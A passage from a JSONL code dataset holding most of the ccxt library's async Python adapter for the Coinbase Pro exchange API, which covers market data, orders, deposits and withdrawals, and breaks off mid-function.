self.s3_bucket.upload_file(Filename=classes_path, Key=f'{name}-v{version}.npy')\n\n # Create and save a new model doc with related information\n self._insert(name, version, metrics, 'name-v0.h5', 'PRODUCTION')\n\n"} {"ext": "py", "sha": "1a2f3a96bacadd20f43b044dc038ace0d13d6a37", "content": "# -*- coding: utf-8 -*-\n\n# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:\n# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code\n\nfrom ccxt.async_support.base.exchange import Exchange\n\n# -----------------------------------------------------------------------------\n\ntry:\n basestring # Python 3\nexcept NameError:\n basestring = str # Python 2\nimport hashlib\nfrom ccxt.base.errors import ExchangeError\nfrom ccxt.base.errors import AuthenticationError\nfrom ccxt.base.errors import PermissionDenied\nfrom ccxt.base.errors import ArgumentsRequired\nfrom ccxt.base.errors import InsufficientFunds\nfrom ccxt.base.errors import InvalidAddress\nfrom ccxt.base.errors import InvalidOrder\nfrom ccxt.base.errors import OrderNotFound\nfrom ccxt.base.errors import NotSupported\nfrom ccxt.base.errors import RateLimitExceeded\nfrom ccxt.base.errors import OnMaintenance\nfrom ccxt.base.decimal_to_precision import TICK_SIZE\nfrom ccxt.base.precise import Precise\n\n\nclass coinbasepro(Exchange):\n\n def describe(self):\n return self.deep_extend(super(coinbasepro, self).describe(), {\n 'id': 'coinbasepro',\n 'name': 'Coinbase Pro',\n 'countries': ['US'],\n 'rateLimit': 1000,\n 'userAgent': self.userAgents['chrome'],\n 'pro': True,\n 'has': {\n 'cancelAllOrders': True,\n 'cancelOrder': True,\n 'CORS': True,\n 'createDepositAddress': True,\n 'createOrder': True,\n 'deposit': True,\n 'fetchAccounts': True,\n 'fetchBalance': True,\n 'fetchCurrencies': True,\n 'fetchClosedOrders': True,\n 'fetchDepositAddress': False, # the exchange does not have self method, only createDepositAddress, see https://github.com/ccxt/ccxt/pull/7405\n 'fetchMarkets': True,\n 'fetchMyTrades': True,\n 'fetchOHLCV': True,\n 'fetchOpenOrders': True,\n 'fetchOrder': True,\n 'fetchOrderBook': True,\n 'fetchOrders': True,\n 'fetchOrderTrades': True,\n 'fetchTime': True,\n 'fetchTicker': True,\n 'fetchTrades': True,\n 'fetchTransactions': True,\n 'withdraw': True,\n 'fetchDeposits': True,\n 'fetchWithdrawals': True,\n },\n 'timeframes': {\n '1m': 60,\n '5m': 300,\n '15m': 900,\n '1h': 3600,\n '6h': 21600,\n '1d': 86400,\n },\n 'hostname': 'pro.coinbase.com',\n 'urls': {\n 'test': {\n 'public': 'https://api-public.sandbox.pro.coinbase.com',\n 'private': 'https://api-public.sandbox.pro.coinbase.com',\n },\n 'logo': 'https://user-images.githubusercontent.com/1294454/41764625-63b7ffde-760a-11e8-996d-a6328fa9347a.jpg',\n 'api': {\n 'public': 'https://api.{hostname}',\n 'private': 'https://api.{hostname}',\n },\n 'www': 'https://pro.coinbase.com/',\n 'doc': 'https://docs.pro.coinbase.com',\n 'fees': [\n 'https://docs.pro.coinbase.com/#fees',\n 'https://support.pro.coinbase.com/customer/en/portal/articles/2945310-fees',\n ],\n },\n 'requiredCredentials': {\n 'apiKey': True,\n 'secret': True,\n 'password': True,\n },\n 'api': {\n 'public': {\n 'get': [\n 'currencies',\n 'products',\n 'products/{id}',\n 'products/{id}/book',\n 'products/{id}/candles',\n 'products/{id}/stats',\n 'products/{id}/ticker',\n 'products/{id}/trades',\n 'time',\n ],\n },\n 'private': {\n 'get': [\n 'accounts',\n 'accounts/{id}',\n 'accounts/{id}/holds',\n 'accounts/{id}/ledger',\n 'accounts/{id}/transfers',\n 'coinbase-accounts',\n 'fills',\n 'funding',\n 'fees',\n 'margin/profile_information',\n 'margin/buying_power',\n 'margin/withdrawal_power',\n 'margin/withdrawal_power_all',\n 'margin/exit_plan',\n 'margin/liquidation_history',\n 'margin/position_refresh_amounts',\n 'margin/status',\n 'oracle',\n 'orders',\n 'orders/{id}',\n 'orders/client:{client_oid}',\n 'otc/orders',\n 'payment-methods',\n 'position',\n 'profiles',\n 'profiles/{id}',\n 'reports/{report_id}',\n 'transfers',\n 'transfers/{transfer_id}',\n 'users/self/exchange-limits',\n 'users/self/hold-balances',\n 'users/self/trailing-volume',\n 'withdrawals/fee-estimate',\n ],\n 'post': [\n 'conversions',\n 'deposits/coinbase-account',\n 'deposits/payment-method',\n 'coinbase-accounts/{id}/addresses',\n 'funding/repay',\n 'orders',\n 'position/close',\n 'profiles/margin-transfer',\n 'profiles/transfer',\n 'reports',\n 'withdrawals/coinbase',\n 'withdrawals/coinbase-account',\n 'withdrawals/crypto',\n 'withdrawals/payment-method',\n ],\n 'delete': [\n 'orders',\n 'orders/client:{client_oid}',\n 'orders/{id}',\n ],\n },\n },\n 'commonCurrencies': {\n 'CGLD': 'CELO',\n },\n 'precisionMode': TICK_SIZE,\n 'fees': {\n 'trading': {\n 'tierBased': True, # complicated tier system per coin\n 'percentage': True,\n 'maker': 0.5 / 100, # highest fee of all tiers\n 'taker': 0.5 / 100, # highest fee of all tiers\n },\n 'funding': {\n 'tierBased': False,\n 'percentage': False,\n 'withdraw': {\n 'BCH': 0,\n 'BTC': 0,\n 'LTC': 0,\n 'ETH': 0,\n 'EUR': 0.15,\n 'USD': 25,\n },\n 'deposit': {\n 'BCH': 0,\n 'BTC': 0,\n 'LTC': 0,\n 'ETH': 0,\n 'EUR': 0.15,\n 'USD': 10,\n },\n },\n },\n 'exceptions': {\n 'exact': {\n 'Insufficient funds': InsufficientFunds,\n 'NotFound': OrderNotFound,\n 'Invalid API Key': AuthenticationError,\n 'invalid signature': AuthenticationError,\n 'Invalid Passphrase': AuthenticationError,\n 'Invalid order id': InvalidOrder,\n 'Private rate limit exceeded': RateLimitExceeded,\n 'Trading pair not available': PermissionDenied,\n 'Product not found': InvalidOrder,\n },\n 'broad': {\n 'Order already done': OrderNotFound,\n 'order not found': OrderNotFound,\n 'price too small': InvalidOrder,\n 'price too precise': InvalidOrder,\n 'under maintenance': OnMaintenance,\n 'size is too small': InvalidOrder,\n 'Cancel only mode': OnMaintenance, # https://github.com/ccxt/ccxt/issues/7690\n },\n },\n })\n\n async def fetch_currencies(self, params={}):\n response = await self.publicGetCurrencies(params)\n #\n # [\n # {\n # id: 'XTZ',\n # name: 'Tezos',\n # min_size: '0.000001',\n # status: 'online',\n # message: '',\n # max_precision: '0.000001',\n # convertible_to: [],\n # details: {\n # type: 'crypto',\n # symbol: 'Τ',\n # network_confirmations: 60,\n # sort_order: 53,\n # crypto_address_link: 'https://tzstats.com/{{address}}',\n # crypto_transaction_link: 'https://tzstats.com/{{txId}}',\n # push_payment_methods: ['crypto'],\n # group_types: [],\n # display_name: '',\n # processing_time_seconds: 0,\n # min_withdrawal_amount: 1\n # }\n # }\n # ]\n #\n result = {}\n for i in range(0, len(response)):\n currency = response[i]\n id = self.safe_string(currency, 'id')\n name = self.safe_string(currency, 'name')\n code = self.safe_currency_code(id)\n details = self.safe_value(currency, 'details', {})\n precision = self.safe_number(currency, 'max_precision')\n status = self.safe_string(currency, 'status')\n active = (status == 'online')\n result[code] = {\n 'id': id,\n 'code': code,\n 'info': currency,\n 'type': self.safe_string(details, 'type'),\n 'name': name,\n 'active': active,\n 'fee': None,\n 'precision': precision,\n 'limits': {\n 'amount': {\n 'min': self.safe_number(details, 'min_size'),\n 'max': None,\n },\n 'withdraw': {\n 'min': self.safe_number(details, 'min_withdrawal_amount'),\n 'max': None,\n },\n },\n }\n return result\n\n async def fetch_markets(self, params={}):\n response = await self.publicGetProducts(params)\n #\n # [\n # {\n # \"id\":\"ZEC-BTC\",\n # \"base_currency\":\"ZEC\",\n # \"quote_currency\":\"BTC\",\n # \"base_min_size\":\"0.01000000\",\n # \"base_max_size\":\"1500.00000000\",\n # \"quote_increment\":\"0.00000100\",\n # \"base_increment\":\"0.00010000\",\n # \"display_name\":\"ZEC/BTC\",\n # \"min_market_funds\":\"0.001\",\n # \"max_market_funds\":\"30\",\n # \"margin_enabled\":false,\n # \"post_only\":false,\n # \"limit_only\":false,\n # \"cancel_only\":false,\n # \"trading_disabled\":false,\n # \"status\":\"online\",\n # \"status_message\":\"\"\n # }\n # ]\n #\n result = []\n for i in range(0, len(response)):\n market = response[i]\n id = self.safe_string(market, 'id')\n baseId = self.safe_string(market, 'base_currency')\n quoteId = self.safe_string(market, 'quote_currency')\n base = self.safe_currency_code(baseId)\n quote = self.safe_currency_code(quoteId)\n symbol = base + '/' + quote\n priceLimits = {\n 'min': self.safe_number(market, 'quote_increment'),\n 'max': None,\n }\n precision = {\n 'amount': self.safe_number(market, 'base_increment'),\n 'price': self.safe_number(market, 'quote_increment'),\n }\n status = self.safe_string(market, 'status')\n active = (status == 'online')\n result.append(self.extend(self.fees['trading'], {\n 'id': id,\n 'symbol': symbol,\n 'baseId': baseId,\n 'quoteId': quoteId,\n 'base': base,\n 'quote': quote,\n 'precision': precision,\n 'limits': {\n 'amount': {\n 'min': self.safe_number(market, 'base_min_size'),\n 'max': self.safe_number(market, 'base_max_size'),\n },\n 'price': priceLimits,\n 'cost': {\n 'min': self.safe_number(market, 'min_market_funds'),\n 'max': self.safe_number(market, 'max_market_funds'),\n },\n },\n 'active': active,\n 'info': market,\n }))\n return result\n\n async def fetch_accounts(self, params={}):\n await self.load_markets()\n response = await self.privateGetAccounts(params)\n #\n # [\n # {\n # id: '4aac9c60-cbda-4396-9da4-4aa71e95fba0',\n # currency: 'BTC',\n # balance: '0.0000000000000000',\n # available: '0',\n # hold: '0.0000000000000000',\n # profile_id: 'b709263e-f42a-4c7d-949a-a95c83d065da'\n # },\n # {\n # id: 'f75fa69a-1ad1-4a80-bd61-ee7faa6135a3',\n # currency: 'USDC',\n # balance: '0.0000000000000000',\n # available: '0',\n # hold: '0.0000000000000000',\n # profile_id: 'b709263e-f42a-4c7d-949a-a95c83d065da'\n # },\n # ]\n #\n result = []\n for i in range(0, len(response)):\n account = response[i]\n accountId = self.safe_string(account, 'id')\n currencyId = self.safe_string(account, 'currency')\n code = self.safe_currency_code(currencyId)\n result.append({\n 'id': accountId,\n 'type': None,\n 'currency': code,\n 'info': account,\n })\n return result\n\n async def fetch_balance(self, params={}):\n await self.load_markets()\n response = await self.privateGetAccounts(params)\n result = {'info': response}\n for i in range(0, len(response)):\n balance = response[i]\n currencyId = self.safe_string(balance, 'currency')\n code = self.safe_currency_code(currencyId)\n account = self.account()\n account['free'] = self.safe_string(balance, 'available')\n account['used'] = self.safe_string(balance, 'hold')\n account['total'] = self.safe_string(balance, 'balance')\n result[code] = account\n return self.parse_balance(result)\n\n async def fetch_order_book(self, symbol, limit=None, params={}):\n await self.load_markets()\n # level 1 - only the best bid and ask\n # level 2 - top 50 bids and asks(aggregated)\n # level 3 - full order book(non aggregated)\n request = {\n 'id': self.market_id(symbol),\n 'level': 2, # 1 best bidask, 2 aggregated, 3 full\n }\n response = await self.publicGetProductsIdBook(self.extend(request, params))\n #\n # {\n # \"sequence\":1924393896,\n # \"bids\":[\n # [\"0.01825\",\"24.34811287\",2],\n # [\"0.01824\",\"72.5463\",3],\n # [\"0.01823\",\"424.54298049\",6],\n # ],\n # \"asks\":[\n # [\"0.01826\",\"171.10414904\",4],\n # [\"0.01827\",\"22.60427028\",1],\n # [\"0.01828\",\"397.46018784\",7],\n # ]\n # }\n #\n orderbook = self.parse_order_book(response, symbol)\n orderbook['nonce'] = self.safe_integer(response, 'sequence')\n return orderbook\n\n def parse_ticker(self, ticker, market=None):\n #\n # publicGetProductsIdTicker\n #\n # {\n # \"trade_id\":843439,\n # \"price\":\"0.997999\",\n # \"size\":\"80.29769\",\n # \"time\":\"2020-01-28T02:13:33.012523Z\",\n # \"bid\":\"0.997094\",\n # \"ask\":\"0.998\",\n # \"volume\":\"1903188.03750000\"\n # }\n #\n # publicGetProductsIdStats\n #\n # {\n # \"open\": \"34.19000000\",\n # \"high\": \"95.70000000\",\n # \"low\": \"7.06000000\",\n # \"volume\": \"2.41000000\"\n # }\n #\n timestamp = self.parse8601(self.safe_value(ticker, 'time'))\n bid = self.safe_number(ticker, 'bid')\n ask = self.safe_number(ticker, 'ask')\n last = self.safe_number(ticker, 'price')\n symbol = None if (market is None) else market['symbol']\n return {\n 'symbol': symbol,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'high': self.safe_number(ticker, 'high'),\n 'low': self.safe_number(ticker, 'low'),\n 'bid': bid,\n 'bidVolume': None,\n 'ask': ask,\n 'askVolume': None,\n 'vwap': None,\n 'open': self.safe_number(ticker, 'open'),\n 'close': last,\n 'last': last,\n 'previousClose': None,\n 'change': None,\n 'percentage': None,\n 'average': None,\n 'baseVolume': self.safe_number(ticker, 'volume'),\n 'quoteVolume': None,\n 'info': ticker,\n }\n\n async def fetch_ticker(self, symbol, params={}):\n await self.load_markets()\n market = self.market(symbol)\n request = {\n 'id': market['id'],\n }\n # publicGetProductsIdTicker or publicGetProductsIdStats\n method = self.safe_string(self.options, 'fetchTickerMethod', 'publicGetProductsIdTicker')\n response = await getattr(self, method)(self.extend(request, params))\n #\n # publicGetProductsIdTicker\n #\n # {\n # \"trade_id\":843439,\n # \"price\":\"0.997999\",\n # \"size\":\"80.29769\",\n # \"time\":\"2020-01-28T02:13:33.012523Z\",\n # \"bid\":\"0.997094\",\n # \"ask\":\"0.998\",\n # \"volume\":\"1903188.03750000\"\n # }\n #\n # publicGetProductsIdStats\n #\n # {\n # \"open\": \"34.19000000\",\n # \"high\": \"95.70000000\",\n # \"low\": \"7.06000000\",\n # \"volume\": \"2.41000000\"\n # }\n #\n return self.parse_ticker(response, market)\n\n def parse_trade(self, trade, market=None):\n #\n # {\n # type: 'match',\n # trade_id: 82047307,\n # maker_order_id: '0f358725-2134-435e-be11-753912a326e0',\n # taker_order_id: '252b7002-87a3-425c-ac73-f5b9e23f3caf',\n # order_id: 'd50ec984-77a8-460a-b958-66f114b0de9b',\n # side: 'sell',\n # size: '0.00513192',\n # price: '9314.78',\n # product_id: 'BTC-USD',\n # profile_id: '6244401d-c078-40d9-b305-7ad3551bc3b0',\n # sequence: 12038915443,\n # time: '2020-01-31T20:03:41.158814Z'\n # created_at: '2014-11-07T22:19:28.578544Z',\n # liquidity: 'T',\n # fee: '0.00025',\n # settled: True,\n # usd_volume: '0.0924556000000000',\n # user_id: '595eb864313c2b02ddf2937d'\n # }\n #\n timestamp = self.parse8601(self.safe_string_2(trade, 'time', 'created_at'))\n marketId = self.safe_string(trade, 'product_id')\n symbol = self.safe_symbol(marketId, market, '-')\n feeRate = None\n feeCurrency = None\n takerOrMaker = None\n cost = None\n if market is not None:\n feeCurrencyId = self.safe_string_lower(market, 'quoteId')\n costField = feeCurrencyId + '_value'\n cost = self.safe_number(trade, costField)\n feeCurrency = market['quote']\n liquidity = self.safe_string(trade, 'liquidity')\n if liquidity is not None:\n takerOrMaker = 'taker' if (liquidity == 'T') else 'maker'\n feeRate = market[takerOrMaker]\n feeCost = self.safe_number_2(trade, 'fill_fees', 'fee')\n fee = {\n 'cost': feeCost,\n 'currency': feeCurrency,\n 'rate': feeRate,\n }\n type = None\n id = self.safe_string(trade, 'trade_id')\n side = 'sell' if (trade['side'] == 'buy') else 'buy'\n orderId = self.safe_string(trade, 'order_id')\n # Coinbase Pro returns inverted side to fetchMyTrades vs fetchTrades\n makerOrderId = self.safe_string(trade, 'maker_order_id')\n takerOrderId = self.safe_string(trade, 'taker_order_id')\n if (orderId is not None) or ((makerOrderId is not None) and (takerOrderId is not None)):\n side = 'buy' if (trade['side'] == 'buy') else 'sell'\n priceString = self.safe_string(trade, 'price')\n amountString = self.safe_string(trade, 'size')\n price = self.parse_number(priceString)\n amount = self.parse_number(amountString)\n if cost is None:\n cost = self.parse_number(Precise.string_mul(priceString, amountString))\n return {\n 'id': id,\n 'order': orderId,\n 'info': trade,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'symbol': symbol,\n 'type': type,\n 'takerOrMaker': takerOrMaker,\n 'side': side,\n 'price': price,\n 'amount': amount,\n 'fee': fee,\n 'cost': cost,\n }\n\n async def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):\n # as of 2018-08-23\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a symbol argument')\n await self.load_markets()\n market = self.market(symbol)\n request = {\n 'product_id': market['id'],\n }\n if limit is not None:\n request['limit'] = limit\n response = await self.privateGetFills(self.extend(request, params))\n return self.parse_trades(response, market, since, limit)\n\n async def fetch_trades(self, symbol, since=None, limit=None, params={}):\n await self.load_markets()\n market = self.market(symbol)\n request = {\n 'id': market['id'], # fixes issue #2\n }\n if limit is not None:\n request['limit'] = limit # default 100\n response = await self.publicGetProductsIdTrades(self.extend(request, params))\n return self.parse_trades(response, market, since, limit)\n\n def parse_ohlcv(self, ohlcv, market=None):\n #\n # [\n # 1591514160,\n # 0.02507,\n # 0.02507,\n # 0.02507,\n # 0.02507,\n # 0.02816506\n # ]\n #\n return [\n self.safe_timestamp(ohlcv, 0),\n self.safe_number(ohlcv, 3),\n self.safe_number(ohlcv, 2),\n self.safe_number(ohlcv, 1),\n self.safe_number(ohlcv, 4),\n self.safe_number(ohlcv, 5),\n ]\n\n async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):\n await self.load_markets()\n market = self.market(symbol)\n granularity = self.timeframes[timeframe]\n request = {\n 'id': market['id'],\n 'granularity': granularity,\n }\n if since is not None:\n request['start'] = self.iso8601(since)\n if limit is None:\n # https://docs.pro.coinbase.com/#get-historic-rates\n limit = 300 # max = 300\n else:\n limit = min(300, limit)\n request['end'] = self.iso8601(self.sum((limit - 1) * granularity * 1000, since))\n response = await self.publicGetProductsIdCandles(self.extend(request, params))\n #\n # [\n # [1591514160,0.02507,0.02507,0.02507,0.02507,0.02816506],\n # [1591514100,0.02507,0.02507,0.02507,0.02507,1.63830323],\n # [1591514040,0.02505,0.02507,0.02505,0.02507,0.19918178]\n # ]\n #\n return self.parse_ohlcvs(response, market, timeframe, since, limit)\n\n async def fetch_time(self, params={}):\n response = await self.publicGetTime(params)\n #\n # {\n # \"iso\":\"2020-05-12T08:00:51.504Z\",\n # \"epoch\":1589270451.504\n # }\n #\n return self.safe_timestamp(response, 'epoch')\n\n def parse_order_status(self, status):\n statuses = {\n 'pending': 'open',\n 'active': 'open',\n 'open': 'open',\n 'done': 'closed',\n 'canceled': 'canceled',\n 'canceling': 'open',\n }\n return self.safe_string(statuses, status, status)\n\n def parse_order(self, order, market=None):\n #\n # createOrder\n #\n # {\n # \"id\": \"d0c5340b-6d6c-49d9-b567-48c4bfca13d2\",\n # \"price\": \"0.10000000\",\n # \"size\": \"0.01000000\",\n # \"product_id\": \"BTC-USD\",\n # \"side\": \"buy\",\n # \"stp\": \"dc\",\n # \"type\": \"limit\",\n # \"time_in_force\": \"GTC\",\n # \"post_only\": False,\n # \"created_at\": \"2016-12-08T20:02:28.53864Z\",\n # \"fill_fees\": \"0.0000000000000000\",\n # \"filled_size\": \"0.00000000\",\n # \"executed_value\": \"0.0000000000000000\",\n # \"status\": \"pending\",\n # \"settled\": False\n # }\n #\n timestamp = self.parse8601(self.safe_string(order, 'created_at'))\n marketId = self.safe_string(order, 'product_id')\n market = self.safe_market(marketId, market, '-')\n status = self.parse_order_status(self.safe_string(order, 'status'))\n price = self.safe_number(order, 'price')\n filled = self.safe_number(order, 'filled_size')\n amount = self.safe_number(order, 'size', filled)\n cost = self.safe_number(order, 'executed_value')\n feeCost = self.safe_number(order, 'fill_fees')\n fee = None\n if feeCost is not None:\n feeCurrencyCode = None\n if market is not None:\n feeCurrencyCode = market['quote']\n fee = {\n 'cost': feeCost,\n 'currency': feeCurrencyCode,\n 'rate': None,\n }\n id = self.safe_string(order, 'id')\n type = self.safe_string(order, 'type')\n side = self.safe_string(order, 'side')\n timeInForce = self.safe_string(order, 'time_in_force')\n postOnly = self.safe_value(order, 'post_only')\n stopPrice = self.safe_number(order, 'stop_price')\n clientOrderId = self.safe_string(order, 'client_oid')\n return self.safe_order({\n 'id': id,\n 'clientOrderId': clientOrderId,\n 'info': order,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'lastTradeTimestamp': None,\n 'status': status,\n 'symbol': market['symbol'],\n 'type': type,\n 'timeInForce': timeInForce,\n 'postOnly': postOnly,\n 'side': side,\n 'price': price,\n 'stopPrice': stopPrice,\n 'cost': cost,\n 'amount': amount,\n 'filled': filled,\n 'remaining': None,\n 'fee': fee,\n 'average': None,\n 'trades': None,\n })\n\n async def fetch_order(self, id, symbol=None, params={}):\n await self.load_markets()\n request = {}\n clientOrderId = self.safe_string_2(params, 'clientOrderId', 'client_oid')\n method = None\n if clientOrderId is None:\n method = 'privateGetOrdersId'\n request['id'] = id\n else:\n method = 'privateGetOrdersClientClientOid'\n request['client_oid'] = clientOrderId\n params = self.omit(params, ['clientOrderId', 'client_oid'])\n response = await getattr(self, method)(self.extend(request, params))\n return self.parse_order(response)\n\n async def fetch_order_trades(self, id, symbol=None, since=None, limit=None, params={}):\n await self.load_markets()\n market = None\n if symbol is not None:\n market = self.market(symbol)\n request = {\n 'order_id': id,\n }\n response = await self.privateGetFills(self.extend(request, params))\n return self.parse_trades(response, market, since, limit)\n\n async def fetch_orders(self, symbol=None, since=None, limit=None, params={}):\n request = {\n 'status': 'all',\n }\n return await self.fetch_open_orders(symbol, since, limit, self.extend(request, params))\n\n async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):\n await self.load_markets()\n request = {}\n market = None\n if symbol is not None:\n market = self.market(symbol)\n request['product_id'] = market['id']\n if limit is not None:\n request['limit'] = limit # default 100\n response = await self.privateGetOrders(self.extend(request, params))\n return self.parse_orders(response, market, since, limit)\n\n async def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):\n request = {\n 'status': 'done',\n }\n return await self.fetch_open_orders(symbol, since, limit, self.extend(request, params))\n\n async def create_order(self, symbol, type, side, amount, price=None, params={}):\n await self.load_markets()\n market = self.market(symbol)\n request = {\n # common params --------------------------------------------------\n # 'client_oid': clientOrderId,\n 'type': type,\n 'side': side,\n 'product_id': market['id'],\n # 'size': self.amount_to_precision(symbol, amount),\n # 'stp': 'dc', # self-trade prevention, dc = decrease and cancel, co = cancel oldest, cn = cancel newest, cb = cancel both\n # 'stop': 'loss', # \"loss\" = stop loss below price, \"entry\" = take profit above price\n # 'stop_price': self.price_to_precision(symbol, price),\n # limit order params ---------------------------------------------\n # 'price': self.price_to_precision(symbol, price),\n # 'size': self.amount_to_precision(symbol, amount),\n # 'time_in_force': 'GTC', # GTC, GTT, IOC, or FOK\n # 'cancel_after' [optional]* min, hour, day, requires time_in_force to be GTT\n # 'post_only': False, # invalid when time_in_force is IOC or FOK\n # market order params --------------------------------------------\n # 'size': self.amount_to_precision(symbol, amount),\n # 'funds': self.cost_to_precision(symbol, amount),\n }\n clientOrderId = self.safe_string_2(params, 'clientOrderId', 'client_oid')\n if clientOrderId is not None:\n request['client_oid'] = clientOrderId\n params = self.omit(params, ['clientOrderId', 'client_oid'])\n stopPrice = self.safe_number_2(params, 'stopPrice', 'stop_price')\n if stopPrice is not None:\n request['stop_price'] = self.price_to_precision(symbol, stopPrice)\n params = self.omit(params, ['stopPrice', 'stop_price'])\n timeInForce = self.safe_string_2(params, 'timeInForce', 'time_in_force')\n if timeInForce is not None:\n request['time_in_force'] = timeInForce\n params = self.omit(params, ['timeInForce', 'time_in_force'])\n if type == 'limit':\n request['price'] = self.price_to_precision(symbol, price)\n request['size'] = self.amount_to_precision(symbol, amount)\n elif type == 'market':\n cost = self.safe_number_2(params, 'cost', 'funds')\n if cost is None:\n if price is not None:\n cost = amount * price\n else:\n params = self.omit(params, ['cost', 'funds'])\n if cost is not None:\n request['funds'] = self.cost_to_precision(symbol, cost)\n else:\n request['size'] = self.amount_to_precision(symbol, amount)\n response = await self.privatePostOrders(self.extend(request, params))\n #\n # {\n # \"id\": \"d0c5340b-6d6c-49d9-b567-48c4bfca13d2\",\n # \"price\": \"0.10000000\",\n # \"size\": \"0.01000000\",\n # \"product_id\": \"BTC-USD\",\n # \"side\": \"buy\",\n # \"stp\": \"dc\",\n # \"type\": \"limit\",\n # \"time_in_force\": \"GTC\",\n # \"post_only\": False,\n # \"created_at\": \"2016-12-08T20:02:28.53864Z\",\n # \"fill_fees\": \"0.0000000000000000\",\n # \"filled_size\": \"0.00000000\",\n # \"executed_value\": \"0.0000000000000000\",\n # \"status\": \"pending\",\n # \"settled\": False\n # }\n #\n return self.parse_order(response, market)\n\n async def cancel_order(self, id, symbol=None, params={}):\n await self.load_markets()\n request = {\n # 'product_id': market['id'], # the request will be more performant if you include it\n }\n clientOrderId = self.safe_string_2(params, 'clientOrderId', 'client_oid')\n method = None\n if clientOrderId is None:\n method = 'privateDeleteOrdersId'\n request['id'] = id\n else:\n method = 'privateDeleteOrdersClientClientOid'\n request['client_oid'] = clientOrderId\n params = self.omit(params, ['clientOrderId', 'client_oid'])\n market = None\n if symbol is not None:\n market = self.market(symbol)\n request['product_id'] = market['symbol'] # the request will be more performant if you include it\n return await getattr(self, method)(self.extend(request, params))\n\n async def cancel_all_orders(self, symbol=None, params={}):\n await self.load_markets()\n request = {}\n market = None\n if symbol is not None:\n market = self.market(symbol)\n request['product_id'] = market['symbol'] # the request will be more performant if you include it\n return await self.privateDeleteOrders(self.extend(request, params))\n\n async def fetch_payment_methods(self, params={}):\n return await self.privateGetPaymentMethods(params)\n\n async def deposit(self, code, amount, address, params={}):\n await self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n 'amount': amount,\n }\n method = 'privatePostDeposits'\n if 'payment_method_id' in params:\n # deposit from a payment_method, like a bank account\n method += 'PaymentMethod'\n elif 'coinbase_account_id' in params:\n # deposit into Coinbase Pro account from a Coinbase account\n method += 'CoinbaseAccount'\n else:\n # deposit methodotherwise we did not receive a supported deposit location\n # relevant docs link for the Googlers\n # https://docs.pro.coinbase.com/#deposits\n raise NotSupported(self.id + ' deposit() requires one of `coinbase_account_id` or `payment_method_id` extra params')\n response = await getattr(self, method)(self.extend(request, params))\n if not response:\n raise ExchangeError(self.id + ' deposit() error: ' + self.json(response))\n return {\n 'info': response,\n 'id': response['id'],\n }\n\n async def withdraw(self, code, amount, address, tag=None, params={}):\n self.check_address(address)\n await self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n 'amount': amount,\n }\n method = 'privatePostWithdrawals'\n if 'payment_method_id' in params:\n method += 'PaymentMethod'\n elif 'coinbase_account_id' in params:\n method += 'CoinbaseAccount'\n else:\n method += 'Crypto'\n request['crypto_address'] = address\n if tag is not None:\n request['destination_tag'] = tag\n response = await getattr(self, method)(self.extend(request, params))\n if not response:\n raise ExchangeError(self.id + ' withdraw() error: ' + self.json(response))\n return {\n 'info': response,\n 'id': response['id'],\n }\n\n async def fetch_transactions(self, code=None, since=None, limit=None, params={}):\n await self.load_markets()\n await self.load_accounts()\n currency = None\n id = self.safe_string(params, 'id') # account id\n if id is None:\n if code is not None:\n currency = self.currency(code)\n accountsByCurrencyCode = self.index_by(self.accounts, 'currency')\n account = self.safe_value(accountsByCurrencyCode, code)\n if account is None:\n raise ExchangeError(self.id + ' fetchTransactions() could not find account id for ' + code)\n id = account['id']\n request = {}\n if id is not None:\n request['id'] = id\n if limit is not None:\n request['limit'] = limit\n response = None\n if id is None:\n response = await self.privateGetTransfers(self.extend(request, params))\n for i in range(0, len(response)):\n account_id = self.safe_string(response[i], 'account_id')\n account = self.safe_value(self.accountsById, account_id)\n code = self.safe_string(account, 'currency')\n response[i]['currency'] = code\n else:\n response = await self.privateGetAccountsIdTransfers(self.extend(request, params))\n for i in range(0, len(response)):\n response[i]['currency'] = code\n return self.parse_transactions(response, currency, since, limit)\n\n async def fetch_deposits(self, code=None, since=None, limit=None, params={}):\n return self.fetch_transactions(code, since, limit, self.extend({'type': 'deposit'}, params))\n\n async def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):\n return self.fetch_transactions(code, since, limit, self.extend({'type': 'withdraw'}, params))\n\n def parse_transaction_status(self, transaction):\n canceled = self.safe_value(transaction, 'canceled_at')\n if canceled:\n return 'canceled'\n processed = self.safe_value(transaction, 'processed_at')\n completed = self.safe_value(transaction, 'completed_at')\n if completed:\n return 'ok'\n elif processed and not completed:\n return 'failed'\n else:\n return 'pending'\n\n def parse_transaction(self, transaction, currency=None):\n details = self.safe_value(transaction, 'details', {})\n id = self.safe_string(transaction, 'id')\n txid = self.safe_string(details, 'crypto_transaction_hash')\n timestamp = self.parse8601(self.safe_string(transaction, 'created_at'))\n updated = self.parse8601(self.safe_string(transaction, 'processed_at'))\n currencyId = self.safe_string(transaction, 'currency')\n code = self.safe_currency_code(currencyId, currency)\n status = self.parse_transaction_status(transaction)\n amount = self.safe_number(transaction, 'amount')\n type = self.safe_string(transaction, 'type')\n address = self.safe_string(details, 'crypto_address')\n tag = self.safe_string(details, 'destination_tag')\n address = self.safe_string(transaction, 'crypto_address', address)\n fee = None\n if type == 'withdraw':\n type = 'withdrawal'\n address = self.safe_string(details, 'sent_to_address', address)\n feeCost = self.safe_number(details, 'fee')\n if feeCost is not None:\n if amount is not None:\n amount -= feeCost\n fee = {\n 'cost': feeCost,\n 'currency': code,\n }\n return {\n 'info': transaction,\n 'id': id,\n 'txid': txid,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'address': address,\n 'tag': tag,\n 'type': type,\n 'amount': amount,\n 'currency': code,\n 'status': status,\n 'updated': updated,\n 'fee': fee,\n }\n\n async def create_deposit_address(self, code, params={}):\n await self.load_markets()\n currency = self.currency(code)\n accounts = 